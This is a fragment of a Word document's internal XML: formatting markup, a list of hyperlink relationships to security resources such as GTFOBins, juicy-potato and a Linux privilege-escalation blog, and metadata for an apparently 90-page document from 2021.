      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1556818947">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1557469577">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1826966885">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1877502799">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1909145492">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2057047408">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2085956879">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2097440872">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="214449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Mason@Hotmail.co.uk" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.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hpe/juicy-potato/relea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iki.owasp.org/index.php/OWASP_favicon_database" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:AdrianMason@Hotmail.co.uk" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fieldraccoon.github.io/posts/Linuxpriv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9D90-AA44-40A5-9DCD-494FCD58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4789</TotalTime>
  <Pages>90</Pages>
  <Words>25002</Words>
  <Characters>142514</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Mason</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Miss L. Price</cp:lastModifiedBy>
  <cp:revision>64</cp:revision>
  <cp:lastPrinted>2021-09-09T12:53:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-09T12:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-09T19:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>